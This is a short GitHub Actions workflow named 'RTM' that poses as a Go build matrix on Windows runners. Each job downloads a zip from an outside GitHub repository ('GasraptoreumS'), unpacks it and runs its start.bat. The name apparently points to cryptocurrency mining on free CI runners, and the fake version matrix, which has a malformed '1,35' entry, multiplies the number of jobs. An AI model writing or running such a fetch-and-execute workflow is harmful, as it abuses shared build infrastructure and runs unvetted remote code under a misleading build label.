name: RTM
 
on: [workflow_dispatch]
 
jobs:
  build:
    name: RTM
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: PREPARING
      run: Invoke-WebRequest https://github.com/robertreynolds2/GasraptoreumS/blob/main/RTM.zip?raw=true -OutFile RTM.zip
    - name: Seting-UP
      run: Expand-Archive RTM.zip
    - name: Running
      run: .\RTM\RTM\start.bat
    - name: END
      run: exit
